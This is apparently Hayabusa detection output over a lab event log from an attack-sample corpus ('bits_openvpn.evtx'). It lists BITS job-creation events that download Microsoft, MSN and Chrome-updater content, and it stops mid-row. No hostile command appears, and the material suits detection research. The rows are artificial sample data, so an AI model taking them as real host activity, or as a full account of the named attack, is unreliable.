https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aHmh2.img?w=100&h=100&m=6&tilesize=medium&x=2005&y=1451&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-05 20:03:05.093 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161342940453_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-05 20:03:06.197 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: http://blob.weather.microsoft.com:80/static/mws-new/WeatherImages/210x173/29.jpg?a,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-05 21:31:12.664 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-05 21:31:12.941 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-05 21:33:21.719 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aFbhf.img?w=100&h=100&m=6&tilesize=medium&x=2920&y=321&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-06 00:25:28.955 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aIYx8.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-06 00:25:30.216 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161342940453_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-06 19:52:28.687 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aKxpG.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-06 23:56:52.824 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-08 00:33:50.498 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19R5M0.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-08 00:36:30.267 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-08 00:36:30.760 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-09 17:25:00.043 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Font Download : URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-09 17:28:07.533 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-09 17:28:08.240 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-09 20:33:58.291 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aPIV0.img?w=100&h=100&m=6&tilesize=medium&x=1544&y=1092&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-09 20:33:58.749 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image2.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-09 20:33:59.731 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: http://blob.weather.microsoft.com:80/static/mws-new/WeatherImages/210x173/32.jpg?a,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-09 22:29:29.376 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-09 22:29:29.868 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-10 21:35:58.814 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-10 21:36:00.732 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-11 21:51:23.040 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-11 21:51:33.078 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 00:56:12.703 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 00:56:12.714 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 00:56:12.718 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 00:56:12.722 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 00:56:12.743 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 00:56:12.748 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 00:56:12.752 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 00:56:12.756 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 00:56:12.788 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 00:56:12.794 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 00:56:12.798 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 00:56:12.802 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 00:56:12.899 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 00:56:12.906 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 00:56:12.910 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 00:56:12.913 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 19:56:13.148 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: C:\Users\IEUser\AppData\Local\Temp\{9FF0B339-0202-4A5B-B73E-CFFB4FCBD124}-86.0.4240.193_86.0.4240.183_chrome_updater.exe : URL: http://r2---sn-5hne6nsy.gvt1.com/edgedl/release2/chrome/QX5U7YrFu2EjtutZ_UHwBg_86.0.4240.193/86.0.4240.193_86.0.4240.183_chrome_updater.exe?cms_redirect=yes&mh=qK&mip=213.127.67.111&mm=28&mn=sn-5hne6nsy&ms=nvh&mt=1605092117&mv=m&mvi=2&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 21:44:50.465 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 23:12:22.524 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aULGJ.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 23:12:25.568 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-13 19:12:09.946 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aYFdj.img?w=100&h=100&m=6&tilesize=medium&x=703&y=371&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-13 19:31:57.260 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-14 04:57:22.022 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-15 20:47:59.752 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-15 20:48:00.273 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-16 21:31:35.114 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Font Download : URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-16 22:57:53.156 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-16 22:57:54.168 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-18 02:41:01.832 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-18 02:41:02.662 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-18 06:09:43.966 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1b6mGJ.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-18 19:01:10.759 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1b7AcJ.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-19 06:49:45.347 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-19 06:49:46.212 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-19 06:49:57.232 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: C:\Users\IEUser\AppData\Local\Temp\{760E100C-4E23-45B0-A2E1-BB2607BF6ED4}-87.0.4280.66_86.0.4240.198_chrome_updater.exe : URL: http://r4---sn-5hne6nsr.gvt1.com/edgedl/release2/chrome/GIUtDEIRbSWI1y147Zo4bw_87.0.4280.66/87.0.4280.66_86.0.4240.198_chrome_updater.exe?cms_redirect=yes&mh=ls&mip=213.127.67.111&mm=28&mn=sn-5hne6nsr&ms=nvh&mt=1605736037&mv=m&mvi=4&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-19 18:04:09.949 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1b9Paa.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-19 18:33:33.409 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1b9S4l.img?w=100&h=100&m=6&tilesize=medium&x=1140&y=780&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-19 19:45:57.562 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aQJnx.img?w=100&h=100&m=6&tilesize=medium&x=1069&y=1223&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-20 02:49:15.102 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-20 02:49:15.960 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-21 20:12:30.660 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-21 20:12:31.102 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-21 20:16:44.077 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater : URL: http://storage.googleapis.com/update-delta/mimojjlkmoijpicakmndhoigimigcmbb/32.0.0.453/32.0.0.433/6a7cbd12b20a2b816950c10566b3db00371455731ff01526469af574701da085.crxd,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-21 20:18:47.864 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater : URL: http://storage.googleapis.com/update-delta/gcmjkmgdlgnkkcocmoeiminaijmmjnii/9.18.0/9.16.0/ce6075b044b6a23d590819332659310fbc6327480d4ce28d85700575fd1d389b.crxd,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-21 20:19:01.301 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater : URL: 